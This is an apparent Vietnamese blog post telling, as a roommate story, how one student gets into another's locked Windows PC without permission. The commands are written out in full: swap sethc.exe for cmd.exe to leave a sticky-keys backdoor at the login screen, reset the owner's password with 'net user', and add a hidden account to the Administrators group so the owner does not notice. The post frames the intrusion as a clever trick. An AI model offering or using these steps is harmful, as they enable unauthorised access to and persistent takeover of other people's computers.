Skip to main content

Reset password Admin không cần hirenboot

Tý và Tèo là sinh viên và ở chung 1 phòng trọ. Tý có máy tính mà không cho Tèo sài ké, Tèo chỉ được ké máy khi có Tý ở cùng (Tý đặt password cho Adminin và tắt giao diện welcome screen, không cho boot từ CD và đặt password bios). Vậy thì khi Tý đi vắng thì Tèo làm thế nào để có thể dùng máy ? Tèo đã áp dụng chiêu này và "bùa" trước cái máy trong khi Tý cho phép sài ké.
Lợi dụng lúc Tý không chú ý, Tèo gõ lệnh :


cd C:\WINDOWS\system32
copy cmd.exe sethc.exe
picture1608_1
Sau khi Tèo đi vắng thì Tý boot máy, tới giao diện đăng nhập thì Tèo nhấn phím Shift 5 lần để gọi CMD.
- Sau khi có được cmd thì Tèo gõ lệnh sau để reset password thành 123


net user DaoDuyHieu 123
- Để tránh trường hợp Tý phát hiện là đã bị đổi pass, Tèo add thêm user tên mình và gán vào group Administrators


net user teo 123 /add
net localgroup Administrators teo /add
picture1608_2
Lúc này thì Tèo đã có thể dùng máy thoải mái khi Tý đi vắng :D

Share